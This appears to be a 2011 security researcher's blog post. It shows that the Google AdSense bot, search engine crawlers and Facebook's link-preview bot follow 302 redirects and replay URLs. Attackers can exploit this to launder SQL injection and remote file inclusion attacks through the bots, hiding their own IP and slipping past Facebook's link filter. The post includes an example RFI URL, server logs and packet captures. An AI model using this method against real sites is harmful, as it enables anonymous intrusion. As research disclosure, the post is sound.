Some months ago, I was interested by suspicious alerts, generated on our Honey Net, how are related to the dedicated Google AdSense “Mediapartners-Google*” bot.
If the web page how has been invoked, first by the visitor, contain SQL injection, RFI, LFI or XSS URL parameters, Mediapartners bot will replay the attack. So if you are vulnerable to theses web attacks, you will get owned first by the visitor how has invoke the vulnerable URL, then by Mediapartners bot how will copycat the visitor action. I tested with SQL injections and RFI vulnerabilities, my lab was all the time owned, in a second time, by the Mediapartners bot.
This bot behavior, is interesting, cause you could need a web attack how require two sequences, the first sequence will be made by the visitor call, then the second action by the bot. For example, on a RFI vulnerability (http://www.example.com/test.php?id=http://www.proxy.com/id.txt), the visitor first call, will execute the “id.txt” code, and directly after the code execution the original id.txt code could be automatically replaced by a different code, how will be then called by the Mediapartners copycat bot.
Mediapartners bot is not a “classical” search engine bot. “Classical” search engine bot will visit your website depending the popularity of your website, and surely others criteria, so you don’t have any control on when they will come visit you. In 2001, lcamtuf (aka Michal Zalewski) has publish a Phrack “Rise of the Robots” article how demonstrate that classical search engine, with them natural “link follow” behavior, could also participate to hack vulnerable websites. Just create a web page with thousands of SQL injections, or RFI, web links, the search engine bot will follow the links and execute the web attacks. This technique is known as “link spam“. But as described by lcamtuf you don’t have the control on the bot visit timeline.
But you still have a trouble, you have to reveal your source IP, by the first web page invocation, the attack is not transparent.
“Classical” search engine bots have interesting features, for example the could react the 301 or 302 HTTP redirection. So you could redirect, certain bots, where you want. Just take a look at the following code, and replace “Bots“, with a bot fingerprint :
I have test the 302 redirection with the most common search engine bots, and have see that most of them are “vulnerable”.
184.108.40.206 – – [14/Jan/2011:21:56:38 +0100] “GET /random_url.php HTTP/1.1” 302 236957 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)”
220.127.116.11 – – [14/Jan/2011:21:56:40 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)”
18.104.22.168 – – [14/Jan/2011:21:56:41 +0100] “GET / HTTP/1.1” 200 15146 “-” “msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)”
22.214.171.124 – – [14/Jan/2011:22:34:49 +0100] “GET /random_url.php HTTP/1.1” 302 19847 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”
126.96.36.199 – – [14/Jan/2011:22:34:50 +0100] “GET /robots.txt HTTP/1.1” 200 74 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”
188.8.131.52 – – [14/Jan/2011:22:34:51 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”
- Yahoo! Slurp
184.108.40.206 – – [16/Jan/2011:09:08:55 +0100] “GET /random_url.php HTTP/1.0” 302 – “-” “Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)”
220.127.116.11 – – [14/Jan/2011:22:09:02 +0100] “GET /random_url.php HTTP/1.1” 302 71861 “-” “Googlebot-Image/1.0”
All the time, the bots have execute the web attacks, and they was the only source IP of the attack, they’re is no need to directly to reveal yourself for web hacking, the search engine bots will do the job for you. But as I explained, you don’t have any control on the bot invocation.
After some searches I discovered that Mediapartners bot is also vulnerable to the 302 redirection. So you know how to call the bot, and you have control on him by redirecting him where you want.
testSome random text
Here under the result. I still have to first invoke the bot, but then the bot will be redirected to the target URL, hiding my source IP.
18.104.22.168 – – [13/Jan/2011:00:27:40 +0100] “GET /random_URL.php HTTP/1.1” 200 1290 “-” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.231 Safari/534.10”
22.214.171.124 – – [13/Jan/2011:00:27:42 +0100] “GET /random_URL.php HTTP/1.1” 302 1288 “-” “Mediapartners-Google”
126.96.36.199 – – [13/Jan/2011:00:27:42 +0100] “GET / HTTP/1.1” 200 15146 “-” “Mediapartners-Google”
What is interesting to see is that the Mediapartners bot source IP on the C&C server is not the same than the source IP on the target server. The Mediapartners bots are sharing orders between different source servers.
I have now a fully controllable bot, time and target are customizable. It is quiet simple to create a C&C back-end how will generate random on demand web pages, and do the invocation of the bot. After more tests Mediapartners bot is not only supporting HTTP or HTTPS protocol, but also FTP.
188.8.131.52 – – [15/Jan/2011:00:19:26 +0100] “GET /random_URL.php HTTP/1.1” 302 91754 “-” “Mediapartners-Google”
[email protected] ~]# tcpdump -n port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
00:19:27.956865 IP 184.108.40.206.43666 > xxx.xxx.xxx.xxx.ftp: S 1218834134:1218834134(0) win 5840
00:19:27.956983 IP xxx.xxx.xxx.xxx.ftp > 220.127.116.11.43666: S 2218131910:2218131910(0) ack 1218834135 win 5792
00:19:27.972538 IP 18.104.22.168.43666 > xxx.xxx.xxx.xxx.ftp: . ack 1 win 92
00:19:27.973972 IP xxx.xxx.xxx.xxx.ftp > 22.214.171.124.43666: P 1:266(265) ack 1 win 91
00:19:27.989653 IP 126.96.36.199.43666 > xxx.xxx.xxx.xxx.ftp: . ack 266 win 108
00:19:27.989864 IP 188.8.131.52.43666 > xxx.xxx.xxx.xxx.ftp: P 1:17(16) ack 266 win 108
00:19:27.989894 IP xxx.xxx.xxx.xxx.ftp > 184.108.40.206.43666: . ack 17 win 91
00:19:27.990238 IP xxx.xxx.xxx.xxx.ftp > 220.127.116.11.43666: F 266:266(0) ack 17 win 91
00:19:28.005937 IP 18.104.22.168.43666 > xxx.xxx.xxx.xxx.ftp: F 17:17(0) ack 267 win 108
00:19:28.005975 IP xxx.xxx.xxx.xxx.ftp > 22.214.171.124.43666: . ack 18 win 91
Is Mediapartners bot the only bot how is fully controllable ? No 🙂 Another example is the Facebook “facebookexternalhit” bot. Here under the description of the bot :
“Facebook allows its users to send links to interesting web content to other Facebook users. Part of how this works on the Facebook system involves the temporary display of certain images or details related to the web content, such as the title of the webpage or the embed tag of a video. Our system retrieves this information only after a user provides us with a link.”
When you publish an URL on your Facebook wall status, “facebookexternalhit” bot will fetch the URL and cache the content for later delivery. So, you have control on the bot invocation. Facebook has some security mechanisms how don’t permit you to publish a link on your wall containing SQL injection, RFI, LFI or XSS in parameters.
But “facebookexternalhit” bot is also vulnerable to 302 redirection, so permitting you to trick the security mechanism.
126.96.36.199 – – [14/Jan/2011:22:40:57 +0100] “GET /random_URL.php HTTP/1.1” 302 65629 “-” “facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)”
188.8.131.52 – – [14/Jan/2011:22:40:58 +0100] “GET / HTTP/1.1” 200 9545 “-” “facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)”
Just publish a “normal” link on you Facebook status, the bot will fetch the page and will be directly redirected, for example, on a SQL injection URL. What is funny, is that the result of the web attack will be displayed on your wall 🙂
A lot of bots are vulnerable to different attack, you never see them, but take care of them. I would like to thanks jduck from Metasploit Team, providing me some useful informations.